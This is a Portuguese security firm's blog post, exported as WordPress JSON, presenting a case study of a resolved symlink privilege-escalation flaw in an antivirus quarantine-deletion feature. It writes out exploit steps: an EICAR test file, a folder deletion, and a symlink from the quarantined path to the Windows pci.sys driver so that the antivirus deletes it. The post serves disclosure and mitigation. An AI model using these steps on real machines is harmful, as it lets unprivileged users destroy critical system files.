{"id":156,"date":"2025-02-10T18:14:34","date_gmt":"2025-02-10T18:14:34","guid":{"rendered":"https:\/\/fikresekhel.com\/blog\/?p=156"},"modified":"2025-02-10T18:14:35","modified_gmt":"2025-02-10T18:14:35","slug":"caso-de-estudo-escalacao-de-privilegio-local-ao-excluir-arquivos-da-quarentena","status":"publish","type":"post","link":"https:\/\/fikresekhel.com\/blog\/nossos-cases\/caso-de-estudo-escalacao-de-privilegio-local-ao-excluir-arquivos-da-quarentena\/","title":{"rendered":"Caso de Estudo: Escala\u00e7\u00e3o de Privil\u00e9gio Local ao Excluir Arquivos da Quarentena"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">Resumo do Caso<\/h2>\n\n\n\n<p>Durante uma auditoria de seguran\u00e7a realizada por&nbsp;<strong>FikreSekhel<\/strong>, foi identificada uma vulnerabilidade de&nbsp;<strong>escala\u00e7\u00e3o de privil\u00e9gio local (LPE &#8211; Local Privilege Escalation)<\/strong>&nbsp;em um&nbsp;<strong>sistema de antiv\u00edrus<\/strong>&nbsp;utilizado por um&nbsp;<strong>e-commerce<\/strong>. A falha ocorre no processo de&nbsp;<strong>exclus\u00e3o de arquivos em quarentena<\/strong>, permitindo que um usu\u00e1rio&nbsp;<strong>sem privil\u00e9gios administrativos exclua arquivos cr\u00edticos do sistema<\/strong>&nbsp;atrav\u00e9s de um ataque de&nbsp;<strong>symlink (atalho simb\u00f3lico)<\/strong>.<\/p>\n\n\n\n<p>Essa vulnerabilidade foi classificada como&nbsp;<strong>M\u00e9dia<\/strong>&nbsp;e resolvida ap\u00f3s a implementa\u00e7\u00e3o de verifica\u00e7\u00f5es adicionais na exclus\u00e3o de arquivos.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Linha do Tempo do Incidente<\/strong><\/h2>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><th>Data<\/th><th>Hor\u00e1rio (UTC)<\/th><th>A\u00e7\u00e3o<\/th><\/tr><tr><td>16\/09\/2020<\/td><td>11:27<\/td><td>Vulnerabilidade reportada<\/td><\/tr><tr><td>17\/09\/2020<\/td><td>15:10<\/td><td>Status alterado para &#8220;Triaged&#8221; ap\u00f3s valida\u00e7\u00e3o da falha<\/td><\/tr><tr><td>06\/10\/2020<\/td><td>09:20<\/td><td>Recompensa concedida ao pesquisador<\/td><\/tr><tr><td>10\/02\/2021<\/td><td>23:04<\/td><td>Vulnerabilidade resolvida e status do relat\u00f3rio fechado<\/td><\/tr><tr><td>26\/08\/2024<\/td><td>15:31<\/td><td>Relat\u00f3rio tornado p\u00fablico<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Detalhes da Vulnerabilidade<\/strong><\/h2>\n\n\n\n<p>O sistema de antiv\u00edrus, ao mover um arquivo para&nbsp;<strong>quarentena<\/strong>, n\u00e3o o exclui completamente do local original. Em vez disso,&nbsp;<strong>esvazia seu conte\u00fado, oculta o arquivo e permite sua exclus\u00e3o manual posteriormente<\/strong>. Esse processo \u00e9 vulner\u00e1vel a ataques de&nbsp;<strong>symlink<\/strong>, permitindo que um usu\u00e1rio de baixo privil\u00e9gio engane o sistema para&nbsp;<strong>excluir qualquer arquivo cr\u00edtico do sistema operacional<\/strong>.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Exemplo de C\u00f3digo Explor\u00e1vel<\/strong><\/h3>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>1. Criando um Arquivo Detectado como Malicioso<\/strong><\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>mkdir %userprofile%\\Desktop\\malicioso\n\necho|set \/p=\"X5O!P%@AP&#91;4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*\" &gt; %userprofile%\\Desktop\\malicioso\\teste.exe<\/code><\/pre>\n\n\n\n<p>Esse c\u00f3digo cria um arquivo&nbsp;<strong>EICAR<\/strong>, que ser\u00e1 detectado e colocado em&nbsp;<strong>quarentena<\/strong>&nbsp;pelo antiv\u00edrus.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>2. Criando o Ataque de Symlink<\/strong><\/h4>\n\n\n\n<p>Ap\u00f3s o arquivo ser movido para quarentena, deletamos seu diret\u00f3rio e criamos um symlink apontando para um&nbsp;<strong>arquivo cr\u00edtico do sistema<\/strong>:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>rmdir \/S \/Q %userprofile%\\Desktop\\malicioso\n\nCreateSymlink.exe %userprofile%\\Desktop\\malicioso\\teste.exe C:\\Windows\\System32\\drivers\\pci.sys<\/code><\/pre>\n\n\n\n<p>Agora, o antiv\u00edrus tentar\u00e1 excluir o arquivo&nbsp;<strong>pci.sys<\/strong>&nbsp;(driver do Windows), comprometendo o sistema.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>3. Ativando a Exclus\u00e3o de Arquivos da Quarentena<\/strong><\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>1. Abrir a interface do antiv\u00edrus.\n2. Acessar a se\u00e7\u00e3o de Quarentena.\n3. Selecionar o arquivo e clicar em \"Excluir do PC\".<\/code><\/pre>\n\n\n\n<p>O antiv\u00edrus tentar\u00e1 excluir o arquivo original, mas como ele agora \u00e9 um symlink para&nbsp;<strong>pci.sys<\/strong>, o arquivo cr\u00edtico ser\u00e1 removido.<\/p>\n\n\n\n<p>\ud83d\udd34&nbsp;<strong>Problema:<\/strong>&nbsp;O antiv\u00edrus executa a exclus\u00e3o sem verificar se o arquivo original foi alterado.<\/p>\n\n\n\n<p>\u26a0\ufe0f&nbsp;<strong>Impacto:<\/strong>&nbsp;<strong>Usu\u00e1rios sem privil\u00e9gios administrativos podem excluir arquivos cr\u00edticos do sistema operacional.<\/strong><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">\ud83d\ude80&nbsp;<strong>Impacto da Vulnerabilidade<\/strong><\/h2>\n\n\n\n<p>\ud83d\udd34&nbsp;<strong>Escala\u00e7\u00e3o de Privil\u00e9gio Local (LPE)<\/strong>: Usu\u00e1rios comuns podem deletar arquivos protegidos pelo sistema operacional.<\/p>\n\n\n\n<p>\ud83d\udd34&nbsp;<strong>Comprometimento do Sistema<\/strong>: A remo\u00e7\u00e3o de arquivos cr\u00edticos pode tornar o sistema&nbsp;<strong>inutiliz\u00e1vel<\/strong>, causando&nbsp;<strong>falhas e telas azuis<\/strong>.<\/p>\n\n\n\n<p>\ud83d\udd34&nbsp;<strong>Potencial para Ataques Maiores<\/strong>: A t\u00e9cnica pode ser combinada com outros vetores para&nbsp;<strong>obten\u00e7\u00e3o de privil\u00e9gios administrativos<\/strong>.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Resolu\u00e7\u00e3o e Medidas Preventivas<\/strong><\/h2>\n\n\n\n<p>\u2705&nbsp;<strong>Impedir a exclus\u00e3o de arquivos via symlink<\/strong><\/p>\n\n\n\n<p>\u2705&nbsp;<strong>Verificar a identidade do usu\u00e1rio antes de deletar arquivos protegidos<\/strong><\/p>\n\n\n\n<p>\u2705&nbsp;<strong>Executar opera\u00e7\u00f5es de exclus\u00e3o com permiss\u00f5es do usu\u00e1rio e n\u00e3o do sistema<\/strong><\/p>\n\n\n\n<p>\u2705&nbsp;<strong>Registrar logs detalhados para detectar tentativas de explora\u00e7\u00e3o<\/strong><\/p>\n\n\n\n<p>\u2705&nbsp;<strong>Treinamento da equipe de seguran\u00e7a para reconhecer vetores de ataque semelhantes<\/strong><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Conclus\u00e3o<\/strong><\/h2>\n\n\n\n<p>Este caso refor\u00e7a a necessidade de&nbsp;<strong>valida\u00e7\u00f5es rigorosas em opera\u00e7\u00f5es cr\u00edticas<\/strong>, especialmente quando envolvem&nbsp;<strong>exclus\u00e3o de arquivos do sistema<\/strong>. Implementar&nbsp;<strong>prote\u00e7\u00f5es contra ataques de symlink<\/strong>&nbsp;e validar permiss\u00f5es adequadamente s\u00e3o essenciais para evitar explora\u00e7\u00e3o de&nbsp;<strong>escala\u00e7\u00e3o de privil\u00e9gio local (LPE)<\/strong>.<\/p>\n\n\n\n<p>\ud83d\udd0e&nbsp;<strong>Sua aplica\u00e7\u00e3o est\u00e1 protegida contra ataques de symlink?<\/strong>&nbsp;Testes regulares podem evitar&nbsp;<strong>comprometimento do sistema e ataques de escalonamento de privil\u00e9gios<\/strong>.<\/p>\n\n\n\n<p>\ud83d\udca1&nbsp;<strong>Entre em contato com nossos especialistas e agende uma auditoria de seguran\u00e7a!<\/strong><\/p>\n\n\n\n<p>\ud83d\udcf2\u00a0<strong><a href=\"https:\/\/wa.me\/5514998130671?text=Ol\u00e1,%20gostaria%20de%20mais%20informa\u00e7\u00f5es!\">Clique aqui e converse com um especialista no WhatsApp!<\/a><\/strong><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Resumo do Caso Durante uma auditoria de seguran\u00e7a [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":157,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[24],"tags":[],"class_list":["post-156","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-nossos-cases"],"_links":{"self":[{"href":"https:\/\/fikresekhel.com\/blog\/wp-json\/wp\/v2\/posts\/156","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fikresekhel.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fikresekhel.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fikresekhel.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fikresekhel.com\/blog\/wp-json\/wp\/v2\/comments?post=156"}],"version-history":[{"count":1,"href":"https:\/\/fikresekhel.com\/blog\/wp-json\/wp\/v2\/posts\/156\/revisions"}],"predecessor-version":[{"id":158,"href":"https:\/\/fikresekhel.com\/blog\/wp-json\/wp\/v2\/posts\/156\/revisions\/158"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fikresekhel.com\/blog\/wp-json\/wp\/v2\/media\/157"}],"wp:attachment":[{"href":"https:\/\/fikresekhel.com\/blog\/wp-json\/wp\/v2\/media?parent=156"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fikresekhel.com\/blog\/wp-json\/wp\/v2\/categories?post=156"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fikresekhel.com\/blog\/wp-json\/wp\/v2\/tags?post=156"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}